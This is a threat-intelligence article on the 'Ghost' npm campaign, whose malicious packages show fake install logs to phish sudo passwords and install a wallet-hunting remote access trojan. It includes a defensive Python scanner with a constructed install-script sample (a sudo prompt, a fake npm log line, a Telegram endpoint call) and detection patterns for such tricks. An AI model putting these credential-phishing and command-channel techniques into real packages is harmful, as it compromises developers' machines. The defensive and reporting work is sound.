Cybersecurity researchers have spotted a sneaky new trick used by hackers to compromise developers’ computers. This latest threat, which first appeared at the beginning of February 2026, involves malicious code hidden inside npm packages, which programmers use to create apps. According to researchers at ReversingLabs, this specific attack, dubbed the Ghost campaign, tricks users into thinking they are installing a helpful tool. The software is busy stealing private data in the background.[1]
In total, researchers detected seven malicious packages, including react-state-optimizer-core, carbon-mac-copy-cloner@1.1.0, and multiple versions of coinbase-desktop-sdk. All were published by a single user going by the handle mikilanjillo.
The art of the fake log - What makes this attack stand out is how it hides its tracks. Usually, when you install software, you see text scrolling by or a loading bar. The hackers created fake versions of these screens to make everything look legitimate. The research, which was shared with Hackread.com, pointed to a package called react-state-optimizer-core as a prime example of this tactic. “The sophistication comes from its novel technique of using fake npm install logs to hide malicious activity,” researchers noted. The software even mimics a lagging connection by adding random pauses and a fake progress bar. While this happens, the program asks the user for their sudo password (the master key to the computer’s system), claiming it is needed for optimization purposes or to fix errors.
New Ghost Campaign Uses Fake npm Progress Bars to Phish Sudo Passwords. Fake npm install logs and sudo password prompt (Image credit: ReversingLabs)
Hunting for crypto wallets - Once the user enters that password, the trap is set. The goal is to deploy a Remote Access Trojan (RAT), malware that lets a hacker control a computer from a remote location. This particular RAT is designed to hunt for cryptocurrency wallets and sensitive personal data.
Some versions, such as carbon-mac-copy-cloner@1.1.0 and coinbase-desktop-sdk, even include a separate decryptor file to help the malware unlock stolen files. The hackers also hid their command-and-control instructions in plain sight: most packages pulled data from a Telegram channel, while version 1.5.19 of the Coinbase SDK used the site teletype.in to stay under the radar.
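A defensive check, added here and not taken from the Hackread or ReversingLabs write-ups: it audits an extracted npm package for install-time lifecycle scripts and for the indicators described above (sudo or password prompts, fake npm log lines, Telegram or teletype.in endpoints). It assumes the malicious logic runs through a lifecycle hook such as postinstall, which the article does not state, and the package.json and setup.js contents are constructed samples, not the real packages.

```python
import json
import re

# Constructed package.json: a postinstall hook that runs a bundled script.
SAMPLE_PACKAGE_JSON = r'''
{
  "name": "example-optimizer-core",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node setup.js",
    "build": "tsc -p ."
  }
}
'''

# Constructed setup.js shaped like the behaviour the article describes
# (fake npm log line, random delay, sudo prompt, Telegram endpoint). Not runnable.
SAMPLE_SETUP_JS = r'''
const { execSync } = require("child_process");
console.log("npm WARN deprecated state-tree@1.0.0 optimizing [====>     ] 42%");
await new Promise(r => setTimeout(r, Math.random() * 3000));   // fake lag
const pw = await ask("sudo password required for optimization: ");
const cfg = await fetch("https://api.telegram.org/bot[PLACEHOLDER]/getUpdates");
'''

# Hooks npm runs automatically during `npm install` (skipped with --ignore-scripts).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

SUSPICIOUS = {
    "sudo_prompt": re.compile(r"\bsudo\b|password", re.I),
    "telegram_c2": re.compile(r"api\.telegram\.org|\bt\.me/", re.I),
    "teletype_c2": re.compile(r"teletype\.in", re.I),
    "fake_npm_log": re.compile(r"npm (WARN|info|http)", re.I),
    "remote_exec": re.compile(r"child_process|curl\s[^|\n]*\|\s*(ba)?sh", re.I),
}

def audit_package(package_json: str, script_files: dict) -> dict:
    """Return the lifecycle hooks in package.json and which sources hit which indicator."""
    manifest = json.loads(package_json)
    hooks = {k: v for k, v in manifest.get("scripts", {}).items() if k in LIFECYCLE_HOOKS}
    sources = dict(hooks)          # the hook command lines themselves
    sources.update(script_files)   # JS files those hooks may execute
    hits = {}
    for name, text in sources.items():
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(text):
                hits.setdefault(label, []).append(name)
    return {"hooks": hooks, "indicators": hits}

if __name__ == "__main__":
    print(json.dumps(audit_package(SAMPLE_PACKAGE_JSON, {"setup.js": SAMPLE_SETUP_JS}), indent=2))
```

Any package with a lifecycle hook plus a sudo/password or messaging-service indicator warrants manual review before installation; installing with `npm install --ignore-scripts` prevents the hook from running at all.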
Is this a sign of things to come? This might just be the start of a larger wave of attacks. On 8 March 2026, a firm called JFrog found a similar malicious package named @openclaw-ai/openclawai, suggesting the Ghost campaign could have been a test run.
Some versions, like coinbase-desktop-sdk@1.5.14, even contained debug messages (notes left by the hackers while they were still building the tool). As we know, cybercriminals are always evolving, and these fake loading screens are a clever new way to keep users from spotting the danger.
This article is shared at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information (CTI) via a notification service (RedXray) or an analysis service (CTAC). For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://hackread.com/ghost-campaign-npm-progress-bars-phish-sudo-passwords/